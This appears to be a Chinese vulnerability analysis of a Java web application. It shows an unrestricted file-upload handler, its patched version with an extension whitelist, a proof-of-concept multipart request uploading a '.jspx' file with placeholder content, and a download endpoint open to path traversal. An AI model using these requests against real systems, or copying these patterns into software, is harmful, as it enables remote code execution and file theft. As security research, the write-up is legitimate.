某源码前台RCE漏洞分析

@RequestMapping({"xxxxxxx.do"})@ResponseBodypublicMap<String, String> ueditorUploadImage(@RequestParam("upfile") CommonsMultipartFile upfile, HttpServletRequest request) throws IOException {Map<String, String> map = newHashMap<>();if (upfile != null && upfile.getSize() > 0) {String extName = FileUtil.getFileExtName(upfile.getOriginalFilename());String url = XlyEnvironment.getInstance().getRealpath();String path = XlyEnvironment.getInstance().getXlyUploadDirConfig().getImgUeditor();String fileName = newDate().getTime() + "." + extName;String filePath = path + "/" + fileName;FileUtil.uploadFile(upfile, url + filePath);            map.put("state", "SUCCESS");            map.put("title", fileName);            map.put("original", upfile.getOriginalFilename());            map.put("type", "." + extName);            map.put("url", filePath);            map.put("size", upfile.getSize() + "");        } else {            map.put("state", "FALSE");        }return map;    }}

@RequestMapping({"xxxxx.do"})@ResponseBodypublicMap<String, String> ueditorUploadImage(@RequestParam("upfile") CommonsMultipartFile commonsMultipartFile, HttpServletRequest httpServletRequest) throws IOException {Map<String, String> hashMap = newHashMap<>();if (commonsMultipartFile != null && commonsMultipartFile.getSize() > 0) {String fileExtName = FileUtil.getFileExtName(commonsMultipartFile.getOriginalFilename());if (!CommonFun.validatorFileExtName(newString[]{"jpg", "jpeg", "gif", "bmp", "png"}, fileExtName)) {                hashMap.put("state", "FALSE");            } else {String realpath = XlyEnvironment.getInstance().getRealpath();String str = "ue" + DateUtil.dateTostr(newDate(), "yyyyMMdd") + "_" + DateUtil.getTimeMillis(newDate()) + "." + fileExtName;String str2 = XlyEnvironment.getInstance().getXlyUploadDirConfig().getImgUeditor() + "/" + str;FileUtil.uploadFile(commonsMultipartFile, realpath + str2);                hashMap.put("state", "SUCCESS");                hashMap.put("title", str);                hashMap.put("original", commonsMultipartFile.getOriginalFilename());                hashMap.put("type", "." + fileExtName);                hashMap.put("url", str2);                hashMap.put("size", commonsMultipartFile.getSize() + "");            }        } else {            hashMap.put("state", "FALSE");        }return hashMap;    }}

POST /xxxxxxxx HTTP/1.1Host: xxxxxxxContent-Length: 315Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: multipart/form-data; boundary=----WebKitFormBoundarym8BqwxWphEraUWuEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://127.0.0.1/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close------WebKitFormBoundarym8BqwxWphEraUWuEContent-Disposition: form-data; name="upfile"; filename="1.jspx"Content-Type: application/octet-streamasddasaasddasaasddasaasddasaasddasaasddasaasddasaasddasaasddasaasddasaasddasaasddasaasddasaasddasaasddasaasddasaasddasa------WebKitFormBoundarym8BqwxWphEraUWuE--

@RequestMapping({"/xxxxxxx.do"})publicvoidplugFileDownAnnex_out(HttpServletRequest request, HttpServletResponse response)throws Exception {        response.setContentType("application/msexcel");        response.setHeader("Cache-Control", "no-cache");        LoginUserSession.getLoginUserModel(request);StringfilePathName= request.getParameter("filePathName");if (filePathName.isEmpty()) {return;        }StringfilePath= XlyEnvironment.getInstance().getRealpath() + filePathName;Filefile=newFile(filePath);if (!file.exists()) {return;        }StringextName= FileUtil.getFileExtName(filePathName);        response.setHeader("Content-Disposition", "attachment;filename = 1." + extName);OutputStreamout= response.getOutputStream();try {try {InputStreamin=newFileInputStream(filePath);byte[] buffer = newbyte[1024];while (true) {intlen= in.read(buffer);if (len > 0) {                        out.write(buffer, 0, len);                    } else {                        in.close();                        out.close();return;                    }                }            } catch (IOException e) {                logger.error("下载附件时出错", e.getMessage());                out.close();            }        } catch (Throwable th) {            out.close();throw th;        }    }